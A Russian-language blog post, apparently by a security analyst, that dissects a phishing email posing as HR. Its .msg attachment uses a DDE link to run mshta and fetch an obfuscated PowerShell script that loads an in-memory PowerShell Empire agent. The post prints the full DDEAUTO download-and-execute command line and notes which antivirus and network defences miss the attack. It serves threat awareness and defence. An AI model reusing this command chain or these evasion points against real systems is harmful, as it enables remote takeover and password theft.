Страницы

Ещё один любопытный фишинг

Опять письмо от HR со вложенным .msg файлом


Пользователь увидит такое окно, т.к. внутри DDE ссылка




Если кликнет "yes" ссылка запустится и мелькнет окно браузера




DDEAUTO C:\\Program\\Microsoft\\Office\\Outlook.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe https://cdn03..../Calendar/Office.css "calendar" 
По ссылке завёрнутый в base64 обфуцированный powershell скрипт,

который отключает логирование и загружает закодированный руткит. Руткит можно получить только если юзерагент равен "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0);" и есть  куки "session=QishMRJiuJ6KvsoMj383FYyGPP8=".


Руткит - это кастомно-обфуцированный агент PowerShell Empire, который дает полный удаленный доступ к компьютеру, достает пароль пользователя, позволяет делать скриншоты и т.д. Агент находится целиком в памяти, на диск ничего не записывается, поэтому традиционные антивирусы его не заметят.

Полностью пропатченный Windows 10 x64 со свежим топ5 антивирусом ничего не заметит. Сетевые средства безопасности будут молчать (все хосты, юзер-агенты и сетевые пакеты белые и пушистые). Сетевые фаил-сканнеры (типа Cisco AMP) даже если и умеют смотреть в HTTPS траффик, то ничего там не увидят т.к. файлы обфуцированы/закодированы. Хорошая песочница должна помочь, но только до того момента, как плохие парни встроят в свои скрипты процедуры детекта песочниц. Продвинутые endpoint решения типа Carbon Black, Cylance должны подозрительный PowerShell поймать, но применение NextGen AV решений требует очень зрелой службы ИБ и вагон времени на тюнинг и уменьшение ложных срабатываний.

Ещё один растущий тренд у плохих парней - прокаченный DevOps. Промежуточные сервера и с2 могут подниматься скриптами и меняться несколько раз в течении одной фишинговой кампании, что делает blacklist подход и репутационные фильтры малоэфективными.

Комментариев нет:

Отправить комментарий